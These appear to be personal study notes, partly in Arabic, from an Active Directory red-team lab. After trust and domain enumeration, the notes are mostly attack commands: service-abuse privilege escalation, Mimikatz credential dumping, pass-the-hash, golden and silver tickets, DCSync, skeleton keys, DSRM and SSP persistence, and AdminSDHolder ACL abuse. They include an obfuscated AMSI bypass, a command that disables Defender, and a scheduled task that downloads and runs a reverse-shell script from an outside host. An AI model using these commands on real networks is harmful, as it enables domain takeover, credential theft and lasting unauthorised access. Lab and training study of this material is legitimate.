External Non-transitive One-way NTLM Only Created Manually.Used to access

resources in an NT 4.0 domain or a
domain in another forest that does not
have a forest trust established.
Trust
Notes
Type Characteristics Direction AuthenticationMechanism
One-way Created Manually.Used to access

Transitive or
Realm or Two- Kerberos V5 Only resources between a non-Windows
non-transitive
way Kerberos V5 realm and an AD DS domain.
Parent-Cild
They can only exist between two domains in the same tree with the same contiguous
namespace. The parent domain is always trusted by the child domain. You cannot
manually create a Parent-Child trust.
Tree-Root
A tree-root trust can only be established between the roots of two trees in the
same forest and are always transitive. You cannot manually create a tree-root
trust.
Shortcut
manually created, one-way, transitive trusts. They can only exist within a forest.
They are created to optimize the authentication process shortening the trust path.
Shortcut trusts shorten the trust path.
Forest Trust
manually created, one-way transitive or two-way transitive , trusts that allow you
to provide access to resources between multiple forests.
Forest trusts uses both Kerberos v5 and NTLM authentication across forests where
users can use their Universal Principal Name (UPN) or their Pre-Windows 2000
method (domainName\username). Kerberos v5 is attempted first, and if that fails,
it will then try NTLM.
Forest trusts require DNS resolution to be established between forests
Forest trusts cannot be extended to other forests, such as if Forest 1 trusts

Forest 2, and another forest trust is created between Forest 2 and Forest 3,
Forest 1 does not have an implied trust. If a trust is required, one must be
manually created.
External Trust
one-way or Two-Way, non-transitive trust that is manually created to establish a

trust relationship between AD DS domains that are in different forests, or between
an AD DS domain and Windows NT 4.0 domain.
External trusts allow you to provide users access to resources in a domain outside
of the forest that is not already trusted by a Forest trust.
External trusts are NTLM based, meaning users must authenticate using the Pre-
Windows 2000 logon method (domain\username).NTLM requires NetBIOS name resolution
support for functionality.
Realm Trust
Trust Relationships with Other Operating Systems that also Support Kerberos
Protocol
One-Way Transitive OR Two-Way Transitive → Use Kerberos Authentication Only
A Realm trust can be established to provide resource access and cross-platform

inter-operability between an AD DS domain and non-Windows Kerberos v5 Realm.
Get Forest Details
Get-NetForest -> Get Information for current Forest.

Get-NetForest -Forest <ForestName>
The command returns the current forest name “moneycorp.local”

and the available domains within the forest (moneycorp.local,
dollarcorp.moneycorp.local, and us.dollarcorp.moneycorp.local).
Domain Trust Mapping
Get-NetDomainTrust -> get available trusts within the current or any other trusted domain in the same or external fore
Get-NetDomainTrust -Domain <DomainName>
the existing domain “dollarcorp.moneycorp.local” has 3 trust relationships:
Transitive, 2-way trust with its Forest “moneycorp.local”
Transitive, 2-way trust with its child domain “us.dollarcorp.moneycorp.local”
External 2-way trust with another Forest called “eurocorp.local”
Get-NetForest -Forest eurocorp.local
RootDomainSid : -
Name : eurocorp.local -> External Forest
Sites : {Default-First-Site-Name}
Domains : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local, DC=ForestDnsZones,DC=eurocorp,DC=local, DC=Doma
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : eurocorp.local
Schema : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner : eurocorp-dc.eurocorp.local
NamingRoleOwner : eurocorp-dc.eurocorp.local
Get Domain Structure

To get the structure and hierarchy of the domains within the current or a
specified forest:
Get-NetForestDomain
Get-NetForestDomain -Forest <ForestName>
The above result show that within Our Forest → moneycorp.local is the root domain
, because it doesn’t have any parent domains , and its child domain →
dollarcorp.moneycorp.local
also the “us.dollarcorp.moneycorp.local” domain is child of the

dollarcorp.moneycorp.local domain.
moneycorp.local → dollarcorp.moneycorp.local →
us.dollarcorp.moneycorp.local
User Hunting
On Foothold machine i’ll to check if that user have a local admin access on any other machine
on the domain → so that is a very important to check that by Find-LocalAdminAccess
Find all machines on the current domain Where the current user has local admin access :
Find-LocalAdminAccess -Verbose
it's like that :
Get-NetComputer | Invoke-CheckLocalAdminAccess
Look at figure below it’s like that :
Some time there is a some issue when some ports like ( RPC AND SMB ) used by Find-
LocalAdminAccess are blocked so i’ll used a Find-WMILocalAdminAccess.ps1 to do that :
PS C:\AD\Tools> Find-WMILocalAdminAccess
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA544
Version : 10.0.14393
The current user has Local Admin access on: dcorp-adminsrv.dollarcorp.moneycorp.local -> dcrop-adminsrc ( Other Machine )
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA549
Version : 10.0.14393
The current user has Local Admin access on: dcorp-std181.dollarcorp.moneycorp.local -> dcorp-std181 ( My Machine )
WARNING: Something went wrong. Check the settings, confirm hostname etc, The RPC server is unavailable. (Exception from HRESULT: 0x
Find Local admins on all machines of the domain ( Needs Administrator privs on non-dc
machines )
Invoke-EnumerateLocalAdmin -Verbose
it's look like that :
Get-NetComputer | Get-NetLocalGroup
Find Computers where a domain admin ( or specified user/group ) has sessions
this is for easiest way to privesc to domain admin:

look for a machine where a Domain Admin token or Credential or session are available and
they have a local admin on that machine
if a have that I will to extract credential of Domain Admin and escalate my privellge
Invoke-UserHunter -> Looks for a session of domain admin on all the machine on the Domain and check if the have local admin access
Invoke-UserHunter -GroupName "RDPUsers"
This Function → Invoke-UserHunter it’s running looks like that :
Get-NetComputer | Get-NetSession
Invoke-UserHunter
Confirm admin access :
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Stealth -> Find Computer where a domain admin is logged-in -> chance of success is lower
Privilege escalation - Local

There are various ways of locally escalating privileges on WIN box :
Missing patches.
Automated deployment and AutoLogon password in ClearText. → AutoLogon stored in Win
registry in cleartext .
AlwaysInstallElevated( Any User can run MSI as SYSTEM ).
Misconfigured Services. → Unquoted Service Path , Permission with service it selv .
DLL Hijaking and More.
Tools:
PowerUp
BeRoot
Privesc
Services Issues using PowerUP:

Get Services with unquoted paths and s space in their name.
Get-ServiceUnquoted -Verbose
What is Unquoted Service Path ?
If i have a service installed on : C:\FTPServer\FTP Server\Filezilla\Filezilla.exe

you can see here i have a space in FTP Server → That’s mean i can put a file and execute
like this
C:\FTPServer\FTP.exe → and restart the filezilla.exe server and will FTP.exe executed.
How To prevent a Unquoted Service Path:

Just add “C:\FTPServer\FTP Server\Filezilla\Filezilla.exe”
Get-WmiObject -Class win32_service | select PathName -> Get all path name of services on current machine
By PowerUp.ps1
#1 Unquoted Service Paths
Invoke-AllChecks
#OR
Get-ServiceUnquoted -Verbose
#Abuse
Write-ServiceBinary -Name 'AbyssWebServer' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"
#Restart Service
sc stop AbyssWebServer
sc start AbyssWebServer
#2 Modify Service Executable

Replaces the service binary for the specified service with one that executes a specified
command as SYSTEM.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the
current user can modify the associated service binary listed in the binPath. Backs up
the original service binary to "OriginalService.exe.bak" in service binary location, and
then uses Write-ServiceBinary to create a C# service binary that either adds a local
administrator user or executes a custom command. The new service binary is replaced in
the original service binary path, and a custom object is returned that captures the
original and new service binary configuration.
Invoke-AllChecks
#OR
Get-ModifiableServiceFile -Verbose -> Get services when the current user can overright the binary path or change the args
Why The second does not a vuln Unquoted ? Because the space in Program Files (x86) that
you need
administrator privesc to overright on these file :).
#Abuse
Install-ServiceBinary -Name "AbyssWebServer" -Command "net localgroup administrators user /add"
# Manual
Write-ServiceBinary -Name 'AbyssWebServer' -Command "command" -Path "C:\WebServer\Abyss.exe"
#3 Modify Service BinPath

Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the
current user has configuration modification rights on and executes a series of automated
actions to execute commands as SYSTEM. First, the service is enabled if it was set as
disabled and the original service binary path and configuration state are preserved.
Then the service is stopped and the Set-ServiceBinPath function is used to set the
binary (binPath) for the service to a series of commands, the service is started,
stopped, and the next command is configured. After completion, the original service
configuration is restored and a custom object is returned that captures the service
abused and commands run.
# Enumeration
Invoke-AllChecks
#OR
Get-ModifiableService -verbose -> Modifiy the service it self and temporary make it point to another exec file
# Abuse
Invoke-ServiceAbuse -Name "AbyssWebServer" -Command "net localgroup administrators user /add"
# Manual
sc config "servicename" binPath= "cmd.exe /c net localgroup Administrators user /add"
sc stop "servicename"
sc start "servicename"
Invoke-AllChecks
Invoke-AllChecks is a function that runs all the checks included in the module. The
function outputs results of the checks in a useful format and offers us suggestions for
where to look regarding privilege escalation.
Path 1: Unquoted Paths
Looking at our results from Invoke-AllChecks we can see a check for unquoted service
paths has found the following:
Invoke-AllChecks -> PowerUp.ps1
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\WebServer\abyssws.exe --service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True
This can change the Path of the service we can make the AbyssWebServer Service point to
a new executable Like cmd.exe or powershell.exe , and we can restart this service
BloodHound
Mapping trust other objects and relationships between all the object and entity using data
collecting by ingestor. ( it’s not usefull for RedTeamer , It’s usefull for PT or
BlueTeamer ).
. .\SharpHound.ps1 -> This called ingestor
Invoke-BloodHound -CollectionMethod All

#OR
Invoke-BloodHound -CollectionMethod All -Domain <Domain> -ZipFilename <zipName>
To Aviod detection like ATA ( The Advanced-Threat-Analytics PowerShell module was designed to make it easy for customers to interfa
# Invoke-BloodHound -Collection All -ExcludeDC
after generate a zip file , now run a server of neo4j and bloodhound and also transfare the
zip File to the attacker machine with pscp .
#Install putty tools for pscp

sudo apt install putty-tools
# PSCP command
pscp <username>@<ip_of_target-Machine>:/<Directory_Of_file> <Destination>
#neo4j
neo4j.bat -install-service
now run bloodhound.exe
Invoke-BlooHound -CollectionMethod LoggedOn -> For Session
Lateral Movement - Powershell Remoting ( psexec )
Admin Recon → Leteral Movement → Domain Admin Priv
need to enable remoting ( Enable-PSRemoting ) on Desktop Windows machine. Priv admin
required to do that.
Powershell Remoting use TCP/5985 HTTP Port By Default. and 5956 for ssl.
To Type of PowerShell Remoting:

1. One-To-One
a. Interactive login to other machine , works over a session called ( PSSession )
b. PSSession
i. Interactive
ii. Runs in new process ( wsmprovhost )
iii. Is Stateful.
c. Cmdlets:
a. New-PSSession
b. Enter-PSSession
# First Find-LocalAdminAccess
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Find-LocalAdminAccess
dcorp-adminsrv.dollarcorp.moneycorp.local
#Second Use PSSession To Enter a machine

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Store a session:
$sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

$sess
When Creat a session that will not be killing everytime it’s

statfull.
2. One-To-Many
a. Send Multible command from signle machine to many machines.
b. it’s the best in PowerShell for passing the hashes, using credentials and exec
command on multiple remote computers.
# Use invoke-Command
invoke-Command -ComputerName ComputerName -ScriptBlock{Command;Another Command}
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock{hostname;whoami}

dcorp-adminsrv
dcorp\student181
#Run Function on Remote Machine.

invoke-Command -ComputerName ComputerName -ScriptBlock ${function:name_function}
#Run a script to remotlly Machine.

invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath <Path_Script>
Load a script using Invoke-Command in the session ً ‫ﻣﻬﻢ ﺟﺪا‬
$sess = New-PSSession -ComputerName ComputerName_Have_Local_Admin_Priv
invoke-Command -FilePath <Script_Path> -Session $sess
Enter-PSSession -Session $sess
Note\ When Use Stateful commands in session we cannot do it

parallelly on thousand of machines unless we already create a
sessions for all of those machines
‫ ﺑﻤﻌﻨﻰ اذا ﺗﺒﻲ ﺗﻨﻔﺬ ﻋﻠﻰ اﻛﺜﺮ ﻣﻦ ﺟﻬﺎز ﻻزم ﺗﻨﺸﺊ اﻛﺜﺮ ﻣﻦ ﺟﻠﺴﻪ‬.
What Different Between ConstrainedLanguage , FullLanguage
# Run on Remote Machine adminsrv.

invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock{$ExecutionContext.SessionState.LanguageM
PSComputerName RunspaceId Value

-------------- ---------- -----
dcorp-adminsrv.dollarcorp.moneycorp.local badb42b9-53d6-4d14-8338-e6869369178a ConstrainedLanguage
Deep_Dive_into_PS_ConstrainedLang
7 ‫ﻃﺮﻳﻘﻪ ﺗﺨﻄﻴﻬﺎ ﻓﻲ ﻻب‬
Invoke-Mimikatz
The Script could be used to dump credntials, tickets and more .
it’s very useful for passing and replaying hashes, tickets and for many exiting AD
Attacks
The script needs administrator privileges for dumping credentials from local machine,
Many attacks need specific privileges which are covered while discussing that attack.
# Dump Creds on local machine

Invoke-Mimikatz -DumpCreds
#Dumo Creds on multiple machines

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
# "Over pass the hash ( PTH ) " generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'
Stateful Mimikatz
$sess = New-PSSession -ComputerName SERVER1

# bypass AMSI On Remote Machine
Invoke-Command -Session $sess -ScriptBlock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE'
Invoke-Command -Session $sess -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1
Mimikatz & Credentials:

After a user logs on, a variety of credentials are generated and stored in the Local
Security Authority Subsystem Service, LSASS, process in memory. This is meant to
facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource
access is requested. The credential data may include Kerberos tickets, NTLM password
hashes, LM password hashes (if the password is <15 characters, depending on Windows OS
version and patch level), and even clear-text passwords (to support WDigest and SSP
authentication among others
to prevent the “clear-text” password from being placed in LSASS, the following registry
key needs to be set to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)
What is Pass the Hash ( PtH ) ?

Use NTLM Hash Unknown the password to auth, Without Decrypt The NTLM Password.
What Over Pass the Hash ?

Create a valid Kerberos ticket using the NTLM Hash of the user.
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmHash> /run:powershel
‫ ﻋﺸﺎن ﺗﻔﻬﻢ اﻟﻔﻜﺮه ﺑﺸﻜﻞ ﻛﺎﻣﻞ‬7 ‫ﻣﻬﻢ ﺟﺪا ً ﻣﺘﺎﺑﻌﻪ ﻻب‬
Domain Presistence - Golden Ticket - DCSync
Once we have DA privileges new avenues of persistence, escalation to EA and Attacks across
trust open up!
Kerberos:
Is The basis of authentication in a Windows AD env.
It’s Authentication protocol.
Alternative to NTLM.
Only Works with hostnames , not IP Address .
Preferred over NTLM.
But if i’m Domain Admin ( DA ) i can Access EveryThing 🙂

How Kerberos Works ?
NTLM password hash for Kerberos RC4 encryption.
Logon Ticket (TGT) provides user auth to DC.
Kerberos policy only checked when TGT is created.
DC validates user account only when TGT > 20 mins
Golden Ticket
A golden ticket is signed and encrypted by the hash of krbtgt account which makes it
a valid TGT ticket.
Since user account validation is not done by Domain Controller (KDC service) until
TGT is older than 20 minutes, we can use even deleted/revoked accounts.
The krbtgt user hash could be used to impersonate any user with any privileges from
even a non-domain machine.
Password change has no effect on this attack. If the hash does not match, DC
validates against the previously used password.
This persistent technique is valid as long as the krbtgt hash is not changed twice.
#Running on a DC with DA privs. Extract krbtgt hash.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dc
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain.local>

/sid:<Domain SID> /krbtgt:<:krbtgt hash> /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /aes256:<aes256keyofkrbtgT-optional> /ptt"'
klist
ls \\<DC.targetdomain.local>\c$
PsExec64.exe \\DC.targetdomain.com cmd.exe
#Impacket
python ticketer.py -nthash <:krbtgt hash> -domain-sid <domain sid> -domain <domain.local> <Anyname> export KRB5CCNAME=<Anyuser
#psexec
psexec.py <domain.local>/<Anyuser>@<IP> -k -nopass
#First disable Firewall

Set-MpPreference -DisableRealtimeMonitoring $true
# Now Go to svcadmin machine and save session of computerName dcorp-dc

$sess=New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
#Now run this inside dcorp-dc machine
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Important NTLM Hash for → krbtgt ff46a9d8bd66c6efd77603da26796f35
Get-DomainSID → Domain SID ( S-1-5-21-1874506631-3219952063-538504511 )
Ìnvoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp-moneycorp.local /sid:S-1-5-21-1874506631-3
Now i have A golden ticket on Adminstrator User :
klist :
PS C:\AD\Tools> klist
Current LogonId is 0:0xa7e4c
Cached Tickets: (1)
#0> Client: Administrator @ dollarcorp-moneycorp.local

Server: krbtgt/dollarcorp-moneycorp.local @ dollarcorp-moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 4/26/2022 18:42:16 (local)
End Time: 4/23/2032 18:42:16 (local)
Renew Time: 5/3/2022 18:42:16 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
DCSync Attack
Requires a user with the Replicating Directory Changes All and Replicating Directory Changes privileges.
Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers
groups have these privileges by default. It is also possible for any user to be granted
these specific privileges.
Use the DCSync feature for getting krbtgt hash execute the below command with DA
privileges.
#Check Rights on Domain Object for current user

#AD Module
Get-ACL "AD: \DC=<domain>,DC=local"
Get-ACL "AD: \DC=<domain>,DC=local" | select-object -ExpandProperty Access
#Users with DCSync rights

#Powerview
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "studen
Get-ObjectACL -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.Acti
#To Add DCSync permissions, run on DC:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName studentx -Rights DCSync
Add-DomainObjectACL -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipleIdentity <user>
#Execute attack
#Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' # This attack of DCSync
#Remote execution with impacket

sudo python3 secretsdump.py <domain.local>/<username>:'<pass>'@<IP>
•Using the DCSync option needs no code execution (no need to run Invoke-Mimikatz) on the
target DC.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Domain Presistence - Silver Ticket
Silver Ticket → NTLM hash of the service account password
if we have access NTLM hash of they service account password we can forged a TGS and use it
on they application server.
Silver Ticket Attack → if we can Extract the NTLM hash of service account we can later on
access the service as any user even including high privesc user .
Silver Ticket (TGS) → Ticket Granting Service .
Will fail if PAC check is enabled.
The Privileged Attribute Certificate (PAC) is an extension to Kerberos tickets that contains useful information about a user’s p
rivileges. This information is added to Kerberos tickets by a domain controller when a user authenticates within an Active Dire
ctory domain. When users use their Kerberos tickets to authenticate to other systems, the PAC can be read and used to determine
their level of privileges without reaching out to the domain controller to query for that information (more on that to follow).
Command To get NTLM Hash of the service:

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:<SID>
/target:<ComputerName> /service:CIFS /rc4:<NTLM> /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219

952063-538504511 /target:dcorp-mssql.dollarcorp.moneycorp.local
/service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /ptt"'
/target – the target server’s FQDN.
/service – the kerberos service running on the target server. i.e Service Principal Name
class (or type) [cifs, http, mssql,host]
/rc4: NTLM Hash of the Service Account. Mimikatz "privilege::debug" "sekurlsa::logonpasswords"
/domain – the fully qualified domain name.
/sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-

2222329127”.
/user – username to impersonate
/groups (optional) – group RIDs the user is a member of (the first is the primary group)
default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
/ticket (optional) – provide a path and name for saving the Golden Ticket file to for
later use or use /ptt to immediately inject the golden ticket into memory for use.
/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket
into memory for use.
/id (optional) – user RID. Mimikatz default is 500 (the default Administrator account
RID).
/startoffset (optional) – the start offset when the ticket is available (generally set
to –10 or 0 if this option is used). Mimikatz Default value is 0.
/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480
minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is
10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7
days (10,080 minutes).
Service Type :
We Can Create Silver Ticket via ( HOST SPN ) which allow scedule and execute task:
#1 Create TGS for HOST service :

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952
/service:HOST /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /ptt"'
#2 List Task on their DC

schtasks /S dcorp-dc.dollarcorp.moneycorp.local
#3 Create task to inject our Reverse Shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Taskname" /TR
"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"
#4 Run The task to get Our Shell
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Taskname"
#5 On The powercat
powercat -l -v -p 443 -t 1000
Skeleton Keys:
Skeleton key is a persistence technique where it is possible to patch a Domain
Controller (LSASS process) so that it allows access as any user with a single password.
Injects Skeleton Key into LSASS
Both real password as well as skeleton key would work.
Get stake-holder permission before testing in engagements as this downgrades security.
Persistent as long as LSASS service is not restarted.[ i.e DC reboot. Atleast 1 month
time]
One cannot patch LSASS twice with skeleton key. Requires reboot.
You can access other machines as well as long as they authenticate with the DC which has
been patched and the DC is not rebooted.
Default password :mimikatz
Inject a skeleton key on a Domain Controller•

• Domain Admin privileges required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local
• From a Low-priv computer1
Enter-PSSession -Computer dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator
Password → mimikatz
If LSASS is running as a Protected Process.
We can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of
the target DC
Noise in logs [Service installation [Kernel mode driver]
mimikatz # privilege::debug
mimikatz # !+ <- load the driver
mimikatz # !processprotect /process:lsass.exe /remove <- remove the protection
mimikatz # misc::skeleton <- we can injected !
mimikatz # !-
Domain Presistence - DSRM AND SSP
What is DSRM?
Directory Services Restore Mode → SaveMode for any DC.
There is a local administrator on every DC called "Administrator" whose password is the

DSRM password. This is not a domain user but local.
Known Security issue:
DSRM logon is not permitted over network.
Logon behavior needs to be changed first. → ‫ﻻزم ﻧﻐﻴﺮه ﻋﻦ ﻃﺮﻳﻖ اﻟﺮﻳﺠﺴﺘﺮي‬
After altering the configuration on the DC, it is possible to:
Pass the NTLM hash of this user to access the DC.
Start a DCSync Attack on the DC to access krbtgt hash
Persistence Lifetime: Extremely long, possibly years.

• Get stake-holder permission before testing in engagements as this downgrades security.
#1 Change Logon Behaviour for DSRM Account
#1
Enter-PSSession -Computername dcorp-dc -> Need Domain Admin
#2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -> Check Value of Lsa
#3 Change The value to 2

Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
#4 if set-itemProperty Does set
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Verbose
0 (default): You can only use the DSRM administrator account if the DC is started in
DSRM.
1: You can use the DSRM administrator account to log on if the local AD DS service is
stopped.
2: You can always use the DSRM administrator account (This setting isn’t recommended,
because password policies don’t apply to the DSRM administrator account).
Dump DSRM password ( Need DA privs )
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc

#Or Inside mimikatz.exe
lsadump::sam -ComputerName dcorp-dc
# SAM have contains local user password hashes.
Passing The Hash (PTH)
Note: /domain: is the DC name Not Domain Name
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:<SAM_DSRM> /run:powershell.exe"'
SAM_DSRM → Found via ( Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::sam”’ -

ComputerName dcorp-dc)
DSRM + DCSync = Password data for any domain account
#Mimikatz
@DSRM -> Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /ru
@DSYNC -> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:dollarcorp.moneycorp.local /dc:DCORP-DC /user:dcorp\krbtgt"'
Custom SSP → Security Support Provider:

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain
an authenticated connection.
Some SSP Packages by Microsoft are:
NTLM
Kerberos
Wdigest
CredSSP
Mimikatz provides a custom SSP -mimilib.dll. This SSP logs local logons, service account
and machine account passwords in clear text on the target server.
DLL can be modified to save into C:\SYSVOL instead. This exposes the log file to all users.
Scenario 1 : Modify Registry [Restart required]
Copy mimilib.dll to the same location as LSASS (c:\windows\system32)
Update Security Packages registry key

(HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages) with the
SSP DLL name.
All local logons on the DC are logged to C:\Windows\system32\kiwissp.log
#Supported SSP on DC:

$packages=Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProp
$packages+="mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
#cmd
shutdown -r
Scenario 2 : Using mimikatz [No restart required]
Not stable with Server 2016
Stored to C:\windows\system32\mimilsa.log
Invoke-Mimikatz -Command '"misc::memssp"'
Domain Presistence - ACLs - AdminSDHolder
AdminSDHolder
is a container that exists in every Active Directory domain for a special purpose. The
Access Control List (ACL) of the AdminSDHolder object is used as a template to copy
permissions to all “protected groups” in Active Directory and their members. Active
Directory will take the ACL of the AdminSDHolder object and apply it to all protected users and groups
periodically , if an attacker is able to manipulate the ACL for AdminSDHolder, then those
permissions will automatically be applied to all protected objects. This will give an
attacker a way to create persistent access to privileged accounts within the domain.
AdminSDHolder Default Protected Objects:

Account Operators
Administrators
Backup Operators
Domain Admins
Domain Controllers
Enterprise Admins
Krbtgt
Print Operators
Read-only Domain Controllers
Replicator
Schema Admins
Server Operators
Modifying AdminSDHolder Permissions:

With DA privileges add an ACL for our user for AdminSDHolder Permissions. This will
provide the user full control over AdminSDHolder and thus the Protected Groups.
Instead of Full control, we can select ResetPassword, WriteMembers etc.
# ADModule
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose
# PowerView
#GenericAll
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose
#ResetPassword
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
#WriteMembers
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose
Wait for 1 hour or Run Invoke-SDPropogator on Domain Controller.
1- $sess = NewPSSession -Computername dcorp-dc.dollarcorp.moneycorp.local
2- Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess -> Upload to dcorp-dc computer
3- Enter-PSSession -Session $sess
4- Invoke-SDPropagator -showProgress -timeoutMinutes 1 -Verbose

# Check If it add or not via Get-ObjectACL
5- Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "student1
For pre-Server 2008 machines:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes1 -showProgress -Verbose
Abuse Methods:
#Adding a user to Domain Admins Group

#Powerview_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members testuser -Verbose
#AD-Module
Add-ADGroupMember -Identity 'Domain Admins' -Members testuser
#Resetting a Domain Admin's password

#Powerview_dev
Set-DomainUserPassword -Identity testuser -AccountPassword(ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
#AD-Module
